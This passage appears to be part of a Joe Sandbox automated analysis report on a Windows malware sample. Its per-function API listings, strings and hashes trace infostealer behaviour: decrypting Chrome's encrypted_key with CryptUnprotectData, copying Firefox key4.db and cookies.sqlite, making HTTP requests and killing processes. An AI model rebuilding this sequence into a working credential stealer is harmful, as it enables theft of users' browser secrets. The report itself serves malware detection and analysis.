                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                • InternetOpenA.WININET ref: 004042E1
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,https), ref: 004042F4
                                                                                                                                                                                                                                                                                • InternetConnectA.WININET ref: 0040432D
                                                                                                                                                                                                                                                                                • HttpOpenRequestA.WININET(00000000,GET,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00404360
                                                                                                                                                                                                                                                                                • InternetSetOptionA.WININET(00000000,0000001F,FFFFFFFF,00000004), ref: 00404387
                                                                                                                                                                                                                                                                                • HttpSendRequestA.WININET ref: 0040439B
                                                                                                                                                                                                                                                                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004043B3
                                                                                                                                                                                                                                                                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004043F0
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040446D
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00404478
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Internet$Http$CloseHandleOpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                                                                                                                                                                                                                • String ID: ERROR$GET$HTTP/1.1$https
                                                                                                                                                                                                                                                                                • API String ID: 1693188093-2961588264
                                                                                                                                                                                                                                                                                • Opcode ID: 2e2f3eead9419f441d624b4b2d1e8f2e1cd83a2dda5262dd01751a01b6ddd133
                                                                                                                                                                                                                                                                                • Instruction ID: 3507938dcee9cc1a0527973a4bd5b6eba6c84462808e0f35a45f5f60c0c7131e
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e2f3eead9419f441d624b4b2d1e8f2e1cd83a2dda5262dd01751a01b6ddd133
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D451D771A00319ABDB10DFA4DC85FFF7779AF84704F00452AFA05A7281DB78A985CBA5
                                                                                                                                                                                                                                                                                Function 004078F0 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 264memorystringencryptionCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                  • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,00000000,?,?,?,00000000), ref: 0040794C
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,-00000010,0041FE20,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040796B
                                                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00407999
                                                                                                                                                                                                                                                                                • CryptUnprotectData.CRYPT32 ref: 00407AFA
                                                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?), ref: 00407B13
                                                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 00407B39
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00407BC2
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Local$Alloc$File$Freelstrlen$CloseCreateCryptDataHandleReadSizeUnprotectlstrcpy
                                                                                                                                                                                                                                                                                • String ID: "encrypted_key":"$AES$ChainingMode$ChainingModeGCM$DPAP$_key.txt
                                                                                                                                                                                                                                                                                • API String ID: 72760943-530840575
                                                                                                                                                                                                                                                                                • Opcode ID: 80c8c99dc66d1a3a314694ca8b656682875a6de58e5a181b00e7ea29ddd83769
                                                                                                                                                                                                                                                                                • Instruction ID: 10bc9677902d6ee6c816a36e6349628b10f5ac32de00f2ba7c41a4f543123621
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80c8c99dc66d1a3a314694ca8b656682875a6de58e5a181b00e7ea29ddd83769
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 93A1C571E042159BDB10DFA1CC85BAE7BB5FF44304F10452AE901BB291D778BA45CBA6
                                                                                                                                                                                                                                                                                Function 00409460 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 341filestringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                  • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,?,?,0042119A,?,?,0042150A), ref: 004094C5
                                                                                                                                                                                                                                                                                  • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                  • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004095D2
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                  • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 00409766
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Filelstrcpy$Locallstrcatlstrlen$AllocCloseCopyCreateFindFirstFreeHandleReadSizeSystemTimestrlen
                                                                                                                                                                                                                                                                                • String ID: C:\ProgramData\$\key4.db$cookies.sqlite
                                                                                                                                                                                                                                                                                • API String ID: 621517324-1530792146
                                                                                                                                                                                                                                                                                • Opcode ID: efc8b8d459f8125ef32f95508c9d4e357bcd32b5b3231743abb90690a61e27b0
                                                                                                                                                                                                                                                                                • Instruction ID: 855358d25c22b69566fbc42c17e74533ab55524d0b71b666bfbe4b79f85c7bd2
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: efc8b8d459f8125ef32f95508c9d4e357bcd32b5b3231743abb90690a61e27b0
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6CC1B631A102189BCF14EBB1CC95AEE7779AF44304F44005EF80667292DB7C6EC5CBA9
                                                                                                                                                                                                                                                                                Function 00411FA0 Relevance: 13.6, APIs: 9, Instructions: 59processCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411FB6
                                                                                                                                                                                                                                                                                • Process32First.KERNEL32(00000000,00000128), ref: 00411FC4
                                                                                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,00000128), ref: 00411FD0
                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00411FF1
                                                                                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,00000128), ref: 00411FFE
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,?), ref: 0041200A
                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0041201E
                                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0041202D
                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00412036
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3836391474-0
                                                                                                                                                                                                                                                                                • Opcode ID: 73d56ab98b17da3653dff67e089b2de93a438a2d9c22f275f8cd819916ddfa29
                                                                                                                                                                                                                                                                                • Instruction ID: 924cd2998aa8e6582c44da8d0305fac9719003efd41fa9ed3311d7015259d757
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73d56ab98b17da3653dff67e089b2de93a438a2d9c22f275f8cd819916ddfa29
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B115231104305AFD3201F61BD0CFAFBAADEBC9785F04501DFA45D62A0DF79A851CAA9
                                                                                                                                                                                                                                                                                Function 004109F0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105memoryCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                • GetKeyboardLayoutList.USER32(00000000,00000000,0042150A), ref: 00410A11
                                                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00410A23
                                                                                                                                                                                                                                                                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410A2D
                                                                                                                                                                                                                                                                                • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200), ref: 00410A4D
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411270: memset.MSVCRT ref: 00411281
                                                                                                                                                                                                                                                                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000,00000200,?,?,?), ref: 00410AB4
                                                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 00410B18
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcpy$InfoKeyboardLayoutListLocalLocale$AllocFreelstrcatlstrlenmemset
                                                                                                                                                                                                                                                                                • String ID: /
                                                                                                                                                                                                                                                                                • API String ID: 2580590304-4001269591
                                                                                                                                                                                                                                                                                • Opcode ID: 47d8d58765390bafa4d4b739f7cf5a28c409f74912168362484b764a7be3d9a5
                                                                                                                                                                                                                                                                                • Instruction ID: eea5c3a77f3b4bcccf0633d63ef4e7b0d3230a8af430361ee2a26d3609cb3d8b
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47d8d58765390bafa4d4b739f7cf5a28c409f74912168362484b764a7be3d9a5
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5831A8313043186BD7106B919C89FAF779DEB85748F00051EF9469B291DABCAD8487A9
                                                                                                                                                                                                                                                                                Function 00412050 Relevance: 12.1, APIs: 8, Instructions: 54processCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
